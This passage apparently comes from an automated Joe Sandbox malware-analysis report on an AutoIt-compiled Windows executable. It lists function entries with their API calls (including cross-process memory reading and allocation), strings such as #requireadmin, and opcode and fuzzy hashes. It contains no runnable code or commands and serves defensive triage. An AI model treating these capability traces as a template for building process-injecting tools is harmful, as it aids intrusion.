                                                                      • Part of subcall function 0094B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,009421FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0094B3F8
                                                                      • Part of subcall function 0094B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0094B355
                                                                      • Part of subcall function 0094B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00942194,00000034,?,?,00001004,00000000,00000000), ref: 0094B365
                                                                      • Part of subcall function 0094B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00942194,00000034,?,?,00001004,00000000,00000000), ref: 0094B37B
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 009427CD
                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0094281A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                    • String ID: @
                                                                    • API String ID: 4150878124-2766056989
                                                                    • Opcode ID: 3e1503ba381c506eb713d236356bcff0746655636dc43d6b4a0320812ddc6d61
                                                                    • Instruction ID: e6e7ab810fcea78c653cb92e05509a8e269e3452d550b5b290b59aa38b24d868
                                                                    • Opcode Fuzzy Hash: 3e1503ba381c506eb713d236356bcff0746655636dc43d6b4a0320812ddc6d61
                                                                    • Instruction Fuzzy Hash: EF410C72901218AEDB10DFA4C985FEEBBB8AF45700F104099FA55B7191DB70AE85CB61
                                                                    Function 0091172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\3HnH4uJtE7.exe,00000104), ref: 00911769
                                                                    • _free.LIBCMT ref: 00911834
                                                                    • _free.LIBCMT ref: 0091183E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _free$FileModuleName
                                                                    • String ID: C:\Users\user\Desktop\3HnH4uJtE7.exe
                                                                    • API String ID: 2506810119-1666211088
                                                                    • Opcode ID: 4eb249cbb6f88367414cb571223020698da193d01848f0fe34ea41711dff6a37
                                                                    • Instruction ID: 3df2ea220abb2945e825f007b7815390c7665d701efedd2ca5b58a51819e7361
                                                                    • Opcode Fuzzy Hash: 4eb249cbb6f88367414cb571223020698da193d01848f0fe34ea41711dff6a37
                                                                    • Instruction Fuzzy Hash: AA318E71B0421CBFDB21DF999981EDEBBFCEB85320B5041A6F91497251D6708E80DB90
                                                                    Function 0094C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0094C306
                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 0094C34C
                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009B1990,00BB5748), ref: 0094C395
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$Delete$InfoItem
                                                                    • String ID: 0
                                                                    • API String ID: 135850232-4108050209
                                                                    • Opcode ID: 5927d0474dcb6b95bb4fe496040508c4c4d5485e5f6f0b7c7c3bd3fc4f8c552f
                                                                    • Instruction ID: 24b1ffb55821fd2237094797f486913d7ddd482b1fb6df4cfa4ce9587f82889f
                                                                    • Opcode Fuzzy Hash: 5927d0474dcb6b95bb4fe496040508c4c4d5485e5f6f0b7c7c3bd3fc4f8c552f
                                                                    • Instruction Fuzzy Hash: 0741C3B22093019FD720DF25D844F1ABBE8EF85711F008A1DF9A5972D1D770E904CB62
                                                                    Function 00974416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0097CC08,00000000,?,?,?,?), ref: 009744AA
                                                                    • GetWindowLongW.USER32 ref: 009744C7
                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 009744D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID: SysTreeView32
                                                                    • API String ID: 847901565-1698111956
                                                                    • Opcode ID: df5f5b4666d1d4a68a3329a2074314080f2db72e0f152c967e7bf7a00478dcb0
                                                                    • Instruction ID: 08d2b3f34708a84ba2e9513359b158b8be7ab94b61b10f0c2b8e3194061db798
                                                                    • Opcode Fuzzy Hash: df5f5b4666d1d4a68a3329a2074314080f2db72e0f152c967e7bf7a00478dcb0
                                                                    • Instruction Fuzzy Hash: EF318F72214605AFDF218E38DC45BEA77A9EB49334F208715F979D21E1DB70EC90AB50
                                                                    Function 0096304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0096335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00963077,?,?), ref: 00963378
                                                                    • inet_addr.WSOCK32(?), ref: 0096307A
                                                                    • _wcslen.LIBCMT ref: 0096309B
                                                                    • htons.WSOCK32(00000000), ref: 00963106
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 946324512-2422070025
                                                                    • Opcode ID: ccf7c189b4a9d92af62d3caba4f18cc0561bb1fc336810f576e5841cd5384eff
                                                                    • Instruction ID: c7a38d3f974b15b4f72775757170495dd8a8833e9aa3258da27ffd11a14ac71b
                                                                    • Opcode Fuzzy Hash: ccf7c189b4a9d92af62d3caba4f18cc0561bb1fc336810f576e5841cd5384eff
                                                                    • Instruction Fuzzy Hash: 0F3104352042019FCB20CF28C485EAA77E4EF55318F25C059E9158F392CB72EF85C761
                                                                    Function 00973EB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 89windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00973F40
                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00973F54
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00973F78
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window
                                                                    • String ID: SysMonthCal32
                                                                    • API String ID: 2326795674-1439706946
                                                                    • Opcode ID: d4d6c26b171c1da44e53fb54db22b288bdcf03247ec36cee92aa8f5b3aff9dbc
                                                                    • Instruction ID: 6e8f9a6c27e5343160ca477f9ad74ef4ffab9c40f1424ff2cb734bb0d5823f0a
                                                                    • Opcode Fuzzy Hash: d4d6c26b171c1da44e53fb54db22b288bdcf03247ec36cee92aa8f5b3aff9dbc
                                                                    • Instruction Fuzzy Hash: DF21BF33610219BFEF118F50CC46FEA3B79EF88754F114214FA19AB1D0D6B1A8909B90
                                                                    Function 00974653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00974705
                                                                    • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00974713
                                                                    • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0097471A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$DestroyWindow
                                                                    • String ID: msctls_updown32
                                                                    • API String ID: 4014797782-2298589950
                                                                    • Opcode ID: bed3365a7e529818688dc13c7a4419e00eeb9da0bbf7e6453ef26212a68ae325
                                                                    • Instruction ID: 43f29ceb5d918ee2193e684f15ed106b3541d3395f517db4070885c54efdb04b
                                                                    • Opcode Fuzzy Hash: bed3365a7e529818688dc13c7a4419e00eeb9da0bbf7e6453ef26212a68ae325
                                                                    • Instruction Fuzzy Hash: 7121A1B6604209AFDB14DF68DCD1DB737ADEF8A7A8B004149FA049B251CB30EC11DB60
                                                                    Function 009495AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen
                                                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                    • API String ID: 176396367-2734436370
                                                                    • Opcode ID: f755412d4bb693580ee70ae2414eb0dbcb245ab580c99dc37862201e2b4f17ba
                                                                    • Instruction ID: 86ae42afa664ef09d8a97a2c44420ca9eea450817f9a8cf6f0a66cbe774958f7
                                                                    • Opcode Fuzzy Hash: f755412d4bb693580ee70ae2414eb0dbcb245ab580c99dc37862201e2b4f17ba
                                                                    • Instruction Fuzzy Hash: 612157722142506AC335BB29EC16FBB73DCEFA1324F10842AFD49DB081EB55AD81C295
                                                                    Function 009737B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00973840
                                                                    • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00973850
                                                                    • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00973876
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$MoveWindow
                                                                    • String ID: Listbox
                                                                    • API String ID: 3315199576-2633736733
                                                                    • Opcode ID: 33db41532a0e7ac4da6ddbe3a12b75bc7b7dd8ef280580b4940a0172b857038f
                                                                    • Instruction ID: 41b57ecb5a83baf6cabb7e7de5f8e4894489d1b54abe52abeeb126b6bc9500f0
                                                                    • Opcode Fuzzy Hash: 33db41532a0e7ac4da6ddbe3a12b75bc7b7dd8ef280580b4940a0172b857038f
                                                                    • Instruction Fuzzy Hash: F721B073610118BBEF118F54CC85FAB376EEF89764F10C114F9089B190C671DC5297A0
                                                                    Function 009549F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00954A08
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00954A5C
                                                                    • SetErrorMode.KERNEL32(00000000,?,?,0097CC08), ref: 00954AD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$InformationVolume
                                                                    • String ID: %lu
                                                                    • API String ID: 2507767853-685833217
                                                                    • Opcode ID: e96bd08b8e63a2cce8f4c3d60366269800e8357efb479ae700b6a9ae56d683b6
                                                                    • Instruction ID: 48e1c76efc9cacd0eb85b10e9d6974a897a4c66f71fc10f414eba1c42d79f59b
                                                                    • Opcode Fuzzy Hash: e96bd08b8e63a2cce8f4c3d60366269800e8357efb479ae700b6a9ae56d683b6
                                                                    • Instruction Fuzzy Hash: CA319171A00108AFDB50DF68C881EAE7BF8EF49308F1480A8F909DB252D771ED85CB61
                                                                    Function 009741EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0097424F
                                                                    • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00974264
                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00974271
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: msctls_trackbar32
                                                                    • API String ID: 3850602802-1010561917
                                                                    • Opcode ID: 7f3bf888f23b1ee078984f1650eea93ca23d74249ff4dcc165b4fd2ded4f7566
                                                                    • Instruction ID: f39e6257e8410f108ee74142c0b0012b96d01b82f48c3703d89757dfdd460d9a
                                                                    • Opcode Fuzzy Hash: 7f3bf888f23b1ee078984f1650eea93ca23d74249ff4dcc165b4fd2ded4f7566
                                                                    • Instruction Fuzzy Hash: A8110632344248BEEF205F69CC06FAB3BACEF95B64F114514FA59E20A1D371DC619B54
                                                                    Function 00942F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008E6B57: _wcslen.LIBCMT ref: 008E6B6A
                                                                      • Part of subcall function 00942DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00942DC5
                                                                      • Part of subcall function 00942DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00942DD6
                                                                      • Part of subcall function 00942DA7: GetCurrentThreadId.KERNEL32 ref: 00942DDD
                                                                      • Part of subcall function 00942DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00942DE4
                                                                    • GetFocus.USER32 ref: 00942F78
                                                                      • Part of subcall function 00942DEE: GetParent.USER32(00000000), ref: 00942DF9
                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 00942FC3
                                                                    • EnumChildWindows.USER32(?,0094303B), ref: 00942FEB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                    • String ID: %s%d
                                                                    • API String ID: 1272988791-1110647743
                                                                    • Opcode ID: 3b202b976d325215b3e3d8ebc8ae80e908124ba3af4fc9479770cd4931ecbecb
                                                                    • Instruction ID: b303d665162da122b7855239dc4149a0b14891e51c7f955261655ee329122907
                                                                    • Opcode Fuzzy Hash: 3b202b976d325215b3e3d8ebc8ae80e908124ba3af4fc9479770cd4931ecbecb
                                                                    • Instruction Fuzzy Hash: E111AFB1600205ABCF157F748C85FEE37AAFFD4318F048079B909EB292DE3099499B60
                                                                    Function 00975882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009758C1
                                                                    • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 009758EE
                                                                    • DrawMenuBar.USER32(?), ref: 009758FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Menu$InfoItem$Draw
                                                                    • String ID: 0
                                                                    • API String ID: 3227129158-4108050209
                                                                    • Opcode ID: f0930562a29152e908a11ed47ec5d5c69570120c2b4177a0a2f4578783ffb1f6
                                                                    • Instruction ID: 6c94997b93967bfa33a2e4af37d7ba398b1f5d8a49a9fd1b694d16d287dd8b8a
                                                                    • Opcode Fuzzy Hash: f0930562a29152e908a11ed47ec5d5c69570120c2b4177a0a2f4578783ffb1f6
                                                                    • Instruction Fuzzy Hash: 44017932504208EFDB609F21D844BAABBB8FF45360F008099FA4DDA161DB708A84AF21
                                                                    Function 0093D3A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 0093D3BF
                                                                    • FreeLibrary.KERNEL32 ref: 0093D3E5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeLibraryProc
                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                    • API String ID: 3013587201-2590602151
                                                                    • Opcode ID: 134b892a42bb18fbb2cb83b23dce0020e0eb98eb7fdc5dc19ba9338d48214a0e
                                                                    • Instruction ID: 79059795b4d3256436d6ec76e1ce3b3fbdc4a4db29ce02244dcfb01a1cf53a98
                                                                    • Opcode Fuzzy Hash: 134b892a42bb18fbb2cb83b23dce0020e0eb98eb7fdc5dc19ba9338d48214a0e
                                                                    • Instruction Fuzzy Hash: F9F055B690BB218BD37112206C38AAE3359AF00705F988429F916E2045EB20CE80CEC2
                                                                    Function 0094007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2c08788c1616eee6f559080739ba74115317d1da74d2ee4bc3372bb30bf9fb50
                                                                    • Instruction ID: 6f4455df1ddaa773d6f3347347a11d1769cea07ca7f0176ffa878d7175a9755b
                                                                    • Opcode Fuzzy Hash: 2c08788c1616eee6f559080739ba74115317d1da74d2ee4bc3372bb30bf9fb50
                                                                    • Instruction Fuzzy Hash: 9FC14C75A0020AEFDB14CFA4C894EAEBBB5FF88704F108598E615EB251D771ED41DB90
                                                                    Function 00913E80 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
